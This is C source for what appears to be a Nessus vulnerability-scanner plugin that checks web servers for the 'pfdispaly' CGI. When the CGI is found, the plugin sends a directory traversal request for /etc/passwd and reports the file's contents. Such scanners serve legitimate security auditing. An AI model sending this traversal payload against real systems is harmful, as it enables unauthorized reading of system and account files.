
#include <unistd.h>
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <netinet/in.h>    
#include <nessuslib.h>
#include <sys/socket.h>
#define NAME "pfdispaly-cgi tester"
#define DESC "Determination of the presence of the 'pfdispaly' cgi"
#define COPYRIGHT "no copyright"
#define SUMM "determines the presence of the 'pfdispaly' cgi"

int plugin_init(struct arglist *desc);
int plugin_init(struct arglist *desc)
{
	plug_set_name(desc, NAME);
	plug_set_description(desc, DESC);
	plug_set_summary(desc, SUMM);
	plug_set_copyright(desc, COPYRIGHT);
	plug_set_category(desc, ACT_ATTACK);
	plug_set_family(desc, "CGI abuses");
	return(0);
}


int plugin_run(struct arglist * args);	
int plugin_run(struct arglist * args)
{
	if(is_cgi_installed(args, "pfdispaly"))
	{
	char * buffer = emalloc(4096);
	char * result;
	int soc = open_sock_tcp(args, 80);
	
	if(soc<=0)
	 /* Couldn't re-open the connection... Strange !*/
	 post_hole(args, 80, "The 'pfdispaly' cgi is present\nRemote files may be viewed");
	else {
	  	sprintf(buffer, 
		"GET /cgi-bin/pfdispaly?../../../../../etc/passwd\n\n");
		send(soc, buffer, strlen(buffer), 0);
		bzero(buffer, 4096);
		read(soc, buffer, 4096);
		result = emalloc(strlen(buffer) + 100);
		sprintf(result, "The 'pfdispaly' cgi is present\nWe attempted to get /etc/passwd :\n%s\n", buffer);
		efree(buffer);
		post_hole(args, 80, result);
		efree(result);
		close(soc);
		}
	}
	return(0);
}

